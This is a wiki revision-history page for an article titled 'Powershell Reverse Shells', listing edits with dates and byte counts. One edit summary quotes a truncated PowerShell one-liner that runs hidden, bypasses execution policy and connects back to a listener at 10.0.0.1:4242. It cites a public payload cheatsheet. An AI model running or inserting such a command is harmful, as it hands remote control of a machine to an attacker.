Powershell Reverse Shells: Revision history

From RCATs

Diff selection: Mark the radio buttons of the revisions to compare and hit enter or the button at the bottom.
Legend: (cur) = difference with latest revision, (prev) = difference with preceding revision, m = minor edit.

18 September 2023

5 February 2023

28 January 2023

  • curprev 14:2514:25, 28 January 2023Ali3nw3rx talk contribs 1,716 bytes −108 No edit summary
  • curprev 14:1714:17, 28 January 2023Ali3nw3rx talk contribs 1,824 bytes +160 No edit summary
  • curprev 14:1414:14, 28 January 2023Ali3nw3rx talk contribs 1,664 bytes +1,664 Created page with "==Powershell Reverse Shells<ref>https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#powershell</ref>== <syntaxhighlight lang="powershell"> powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.0.0.1",4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName..."